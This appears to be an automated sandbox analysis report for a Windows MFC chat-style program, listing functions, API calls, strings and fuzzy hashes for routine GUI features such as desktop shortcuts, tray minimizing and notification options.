Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4508#537#800H_prolog
String ID: CClientsComView
API String ID: 3708723662-3815392733
Opcode ID: f5231763398586bc397ffa30226dffdb38edd9eed3ab789c25499be452203ed9
Instruction ID: 1dccd825737f3e9720603d0dce54b1a2452e5a5d36d67efae6c178cc665d8ed8
Opcode Fuzzy Hash: f5231763398586bc397ffa30226dffdb38edd9eed3ab789c25499be452203ed9
Instruction Fuzzy Hash: 1BE0E531A145349BC708EB84E8026FD7334EB00324F50056FE022631D2CFB81E008A59

Uniqueness

Uniqueness Score: -1.00%

Function 0040209A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 0040EABC
#1168.MFC42 ref: 0040EAC4
#6402.MFC42(Options,ShortcutDesktop,00000000), ref: 0040EAD9

Part of subcall function 0040149C: _EH_prolog.MSVCRT ref: 0040EB8C
Part of subcall function 0040149C: #540.MFC42 ref: 0040EB9E
Part of subcall function 0040149C: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040EBC1
Part of subcall function 0040149C: #860.MFC42(?), ref: 0040EBD1
Part of subcall function 0040149C: #860.MFC42(00442184,?), ref: 0040EBDE
Part of subcall function 0040149C: #860.MFC42(00442188,00442184,?), ref: 0040EBEB
Part of subcall function 0040149C: #537.MFC42(00008085,00442188,00442184,?), ref: 0040EBF8
Part of subcall function 0040149C: #858.MFC42(00000000,00008085,00442188,00442184,?), ref: 0040EC05
Part of subcall function 0040149C: #800.MFC42(00000000,00008085,00442188,00442184,?), ref: 0040EC11
Part of subcall function 0040149C: #860.MFC42(?,00000000,00008085,00442188,00442184,?), ref: 0040EC20
Part of subcall function 0040149C: SHGetSpecialFolderLocation.SHELL32(00000001,?,?,?,00000000,00008085,00442188,00442184,?), ref: 0040EC42
Part of subcall function 0040149C: SHGetPathFromIDListA.SHELL32(?,?), ref: 0040EC56
Part of subcall function 0040149C: #537.MFC42(0000E000), ref: 0040EC64
Part of subcall function 0040149C: #2818.MFC42(?,%s\%s.lnk,0000E000,00000000,0000E000), ref: 0040EC7F
Part of subcall function 0040149C: #800.MFC42(?,0000E000), ref: 0040EC8E
Part of subcall function 0040149C: #800.MFC42(?,0000E000), ref: 0040ECE9

Strings

Options, xrefs: 0040EAD2
ShortcutDesktop, xrefs: 0040EACD

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #860$#800$#537$#1168#2818#540#6402#858FileFolderFromH_prologListLocationMessageModuleNamePathSendSpecial
String ID: Options$ShortcutDesktop
API String ID: 1573633511-1496474088
Opcode ID: 76fb228f472cd5ec10234de403804e1252d38ab01be98b29024a865a7a9b80f2
Instruction ID: c228bbb561498d670e9cd750f752ed225a1370358ef65f2551f868151dc702de
Opcode Fuzzy Hash: 76fb228f472cd5ec10234de403804e1252d38ab01be98b29024a865a7a9b80f2
Instruction Fuzzy Hash: 3DE0863538031076E6206326AC0BF5B19549BC5B10F11046AB2057B1E2CDB9A81195AC

Uniqueness

Uniqueness Score: -1.00%

Function 004021DF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0042078C
#567.MFC42 ref: 00420798
#567.MFC42 ref: 004207BD

Strings

LB, xrefs: 0042079F
@B, xrefs: 004207AF

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #567$H_prolog
String ID: @B$LB
API String ID: 2890482678-4194680055
Opcode ID: 916cffb69657544639ea92e2657bcc8a85f57dd9eb22c206ec8be151c9bad691
Instruction ID: c568bc45f9b037afc3b98fbfa0d187122afa30698cdea2f0ba4032705a992e9a
Opcode Fuzzy Hash: 916cffb69657544639ea92e2657bcc8a85f57dd9eb22c206ec8be151c9bad691
Instruction Fuzzy Hash: E9F012B0A107B0DFC320DF59A50125ABBE4AB0470CB51886F9446D3B41D7F89504DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401AB4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 0040EA7A
#1168.MFC42 ref: 0040EA82
#6402.MFC42(Options,ShortcutMenu,00000000), ref: 0040EA97

Part of subcall function 0040149C: _EH_prolog.MSVCRT ref: 0040EB8C
Part of subcall function 0040149C: #540.MFC42 ref: 0040EB9E
Part of subcall function 0040149C: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040EBC1
Part of subcall function 0040149C: #860.MFC42(?), ref: 0040EBD1
Part of subcall function 0040149C: #860.MFC42(00442184,?), ref: 0040EBDE
Part of subcall function 0040149C: #860.MFC42(00442188,00442184,?), ref: 0040EBEB
Part of subcall function 0040149C: #537.MFC42(00008085,00442188,00442184,?), ref: 0040EBF8
Part of subcall function 0040149C: #858.MFC42(00000000,00008085,00442188,00442184,?), ref: 0040EC05
Part of subcall function 0040149C: #800.MFC42(00000000,00008085,00442188,00442184,?), ref: 0040EC11
Part of subcall function 0040149C: #860.MFC42(?,00000000,00008085,00442188,00442184,?), ref: 0040EC20
Part of subcall function 0040149C: SHGetSpecialFolderLocation.SHELL32(00000001,?,?,?,00000000,00008085,00442188,00442184,?), ref: 0040EC42
Part of subcall function 0040149C: SHGetPathFromIDListA.SHELL32(?,?), ref: 0040EC56
Part of subcall function 0040149C: #537.MFC42(0000E000), ref: 0040EC64
Part of subcall function 0040149C: #2818.MFC42(?,%s\%s.lnk,0000E000,00000000,0000E000), ref: 0040EC7F
Part of subcall function 0040149C: #800.MFC42(?,0000E000), ref: 0040EC8E
Part of subcall function 0040149C: #800.MFC42(?,0000E000), ref: 0040ECE9

Strings

Options, xrefs: 0040EA90
ShortcutMenu, xrefs: 0040EA8B

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #860$#800$#537$#1168#2818#540#6402#858FileFolderFromH_prologListLocationMessageModuleNamePathSendSpecial
String ID: Options$ShortcutMenu
API String ID: 1573633511-1963026486
Opcode ID: 12bb3e0c1165cbe51e8b3be1c626c9bf192a8cac1f27bec9768806a76b6a1986
Instruction ID: 8e839a27d87c5eae68e8eba10497a5ab0efc7a9bb92696c2f924b5d1a56e7ab8
Opcode Fuzzy Hash: 12bb3e0c1165cbe51e8b3be1c626c9bf192a8cac1f27bec9768806a76b6a1986
Instruction Fuzzy Hash: 59E08C3538031077EA20A326AC0BF6B6AA49BD6B14F11047FB6017B2E2CDB85801826C

Uniqueness

Uniqueness Score: -1.00%

Function 0040105F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 17windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 0040ED20
#1168.MFC42 ref: 0040ED28
#6402.MFC42(Options,ShowSplash,00000000), ref: 0040ED3D

Strings

Options, xrefs: 0040ED36
ShowSplash, xrefs: 0040ED31

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1168#6402MessageSend
String ID: Options$ShowSplash
API String ID: 1634721603-2722220132
Opcode ID: 0b8d7a14fcaa51274c82d43ebc30593f81eb3541df6f96e8e6ed1b90c0563b79
Instruction ID: 6b35543df84e445c69a3a571cc04efd07b8514cfc67e6df6e3086868cf9e4c49
Opcode Fuzzy Hash: 0b8d7a14fcaa51274c82d43ebc30593f81eb3541df6f96e8e6ed1b90c0563b79
Instruction Fuzzy Hash: 03D0A7303C032177EE2073216C0FF4A29409F40754F2104B6B2057F1D2CC7A6851C29C

Uniqueness

Uniqueness Score: -1.00%

Function 0040146F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 17windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 0040EA43
#1168.MFC42 ref: 0040EA4B
#6402.MFC42(Options,MinimizeToTray,00000000), ref: 0040EA60

Strings

Options, xrefs: 0040EA59
MinimizeToTray, xrefs: 0040EA54

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1168#6402MessageSend
String ID: MinimizeToTray$Options
API String ID: 1634721603-2234159149
Opcode ID: c369a7641c29d34c850f334fc6328f6ec3693ea1105e814714bf9fd7958535ce
Instruction ID: 663428b875e79ea23b04f4c30adeb207ea63eb05956c9ad91bf12f26785f03ff
Opcode Fuzzy Hash: c369a7641c29d34c850f334fc6328f6ec3693ea1105e814714bf9fd7958535ce
Instruction Fuzzy Hash: D4D0A73038032077DA20A331BC0FF8629405F14714F2104B6B2057F1D2CCB96811869C

Uniqueness

Uniqueness Score: -1.00%

Function 0040141A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 17windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 0040EAFB
#1168.MFC42 ref: 0040EB03
#6402.MFC42(Options,NotifyAdd,00000000), ref: 0040EB18

Strings

Options, xrefs: 0040EB11
NotifyAdd, xrefs: 0040EB0C

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1168#6402MessageSend
String ID: NotifyAdd$Options
API String ID: 1634721603-3940889958
Opcode ID: 28ca0eb29e94edee5fce034adac248fb17b44f843218bc5b0fc9537e9c17c21e
Instruction ID: 1e43b4d701ba7e3c49982294569acd9f91b3b648fe27e72cd290ef54bf78581a
Opcode Fuzzy Hash: 28ca0eb29e94edee5fce034adac248fb17b44f843218bc5b0fc9537e9c17c21e
Instruction Fuzzy Hash: 48D05E31780320A6EA20A3256C0FF462A906B14B14F2148A676047F1D1C8799811C66C

Uniqueness

Uniqueness Score: -1.00%

Function 004017D0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 17windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 0040EB2F
#1168.MFC42 ref: 0040EB37
#6402.MFC42(Options,NotifyRemove,00000000), ref: 0040EB4C

Strings

Options, xrefs: 0040EB45
NotifyRemove, xrefs: 0040EB40

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1168#6402MessageSend
String ID: NotifyRemove$Options
API String ID: 1634721603-1941499307
Opcode ID: 5a84ce0762c4c7b8fc4d8f284893eba0fdef75f035a20b12a29faf0acc7ca888
Instruction ID: 0fd55f3eb0c85e60a0dda7d2c1769af0f3126b3454ff7d161244c9126bfb9f1a
Opcode Fuzzy Hash: 5a84ce0762c4c7b8fc4d8f284893eba0fdef75f035a20b12a29faf0acc7ca888
Instruction Fuzzy Hash: 29D0A73038032076DA20B3266C0FF963D505F44754F2104B6B3057F1E2CC79A811C25C

Uniqueness

Uniqueness Score: -1.00%

Function 00401BF9, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 17windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 0040EB63
#1168.MFC42 ref: 0040EB6B
#6402.MFC42(Options,NotifyPrivateMessage,00000000), ref: 0040EB80

Strings

NotifyPrivateMessage, xrefs: 0040EB74
Options, xrefs: 0040EB79

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1168#6402MessageSend
String ID: NotifyPrivateMessage$Options
API String ID: 1634721603-3084922971
Opcode ID: f937a2abe272dce172d41526d9ea5e6db766c085c9d41a7e54d3c98e233ea917
Instruction ID: 753c28ab45b653bb881c4e370bc2eb49d1537ab60a893d383e857910193b9bdf
Opcode Fuzzy Hash: f937a2abe272dce172d41526d9ea5e6db766c085c9d41a7e54d3c98e233ea917
Instruction Fuzzy Hash: 51D0A73138032076DA30B361BC0FF853A905F14758F2104B673057F1D1CDB96811825C

Uniqueness

Uniqueness Score: -1.00%

Function 00414F7E, Relevance: 7.6, APIs: 5, Instructions: 122windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00414F83
#823.MFC42(00000024,?,?), ref: 00414FE6
#5860.MFC42(?,00000000,?,?), ref: 00415005
#2408.MFC42(?,00000000,?,?), ref: 0041502D
ModifyMenuA.USER32(000000FF,000000FF,?,000000FF,00000000), ref: 004150B0

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2408#5860#823H_prologMenuModify
String ID:
API String ID: 2340736806-0
Opcode ID: 015f6d2d14f8b2557a91072f01e3ed920526419036c4fdc864f26407eb89d327
Instruction ID: 2c605b64527c2e868bb8eddf7f7abc1f82e9573c0259d69daf0751ec39241f9c
Opcode Fuzzy Hash: 015f6d2d14f8b2557a91072f01e3ed920526419036c4fdc864f26407eb89d327
Instruction Fuzzy Hash: 31415C7190060AEFCF20DFA5D8808EEBBB1FF48314F508A2FE525A3290D7389A45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041FEDC, Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0041FF12
#860.MFC42(?), ref: 0041FF5A
#860.MFC42(?), ref: 0041FF7E
#860.MFC42(?), ref: 0041FFA6
#860.MFC42(?), ref: 0041FFCA

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #860$ByteCharMultiWide
String ID:
API String ID: 295232093-0
Opcode ID: 9c9d6bebefa93855b364a48b383237fa904e1a9844a106236cdcd503aa3ed8dc
Instruction ID: c74b8c16222fa3e2956f28e50f4bea097d7316dc4b11fd43da7dad96d307f59f
Opcode Fuzzy Hash: 9c9d6bebefa93855b364a48b383237fa904e1a9844a106236cdcd503aa3ed8dc
Instruction Fuzzy Hash: FD315E71600605AFCB20DF66CC44F9BB3B8AF89708F00459DA54ADB161DB74F98ACB24

Uniqueness

Uniqueness Score: -1.00%

Function 00415776, Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 00415783
GetSubMenu.USER32 ref: 00415794
#2863.MFC42(00000000), ref: 0041579B
GetMenuItemID.USER32(?,00000000), ref: 004157BF
GetMenuItemCount.USER32 ref: 004157F4

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$Count$#2863
String ID:
API String ID: 3879678142-0
Opcode ID: ce563c349f3ca956ba372b0fe685573ff057a77edbda2066656f15fe3c8f3806
Instruction ID: bdfd937a5a041253d77168638f19bc5683112051b8f69743b42863461156d2c0
Opcode Fuzzy Hash: ce563c349f3ca956ba372b0fe685573ff057a77edbda2066656f15fe3c8f3806
Instruction Fuzzy Hash: B311B134200A05EFCB119F25CD869EB7BA6FFC53507108426F826CA261E735DC91DB28

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1D7, Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

#535.MFC42(?,?), ref: 0040B1F7
#535.MFC42(?,?,?,?,?), ref: 0040B20D
#3811.MFC42(?,?,?,?,?,?), ref: 0040B219
#858.MFC42(?,00000000,?,?,?,?,?,?,?), ref: 0040B249
#860.MFC42(0044215C,?,00000000,?,?,?,?,?,?,?), ref: 0040B25C
#535.MFC42(?,?), ref: 0040B2BF
#535.MFC42(?,?,?,?,?), ref: 0040B2D5
#3811.MFC42(?,?,?,?,?,?), ref: 0040B2E1

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #535$#3811$#858#860
String ID:
API String ID: 2644984707-0
Opcode ID: 386dcec1645c797d319e49602baefa6045b1ae6e5eca5b8dd0f9e2e13de23884
Instruction ID: 4e75bc70a9c4b8ea5c14bd42fe7dac493ac7b498bd225c9a765d3c6790ac883d
Opcode Fuzzy Hash: 386dcec1645c797d319e49602baefa6045b1ae6e5eca5b8dd0f9e2e13de23884
Instruction Fuzzy Hash: 6E218070E00358EBCF05EFE5D986AEEBBB9AF09314F50015EE005B3282C7386A04CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00401609, Relevance: 7.6, APIs: 5, Instructions: 64windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041B06A
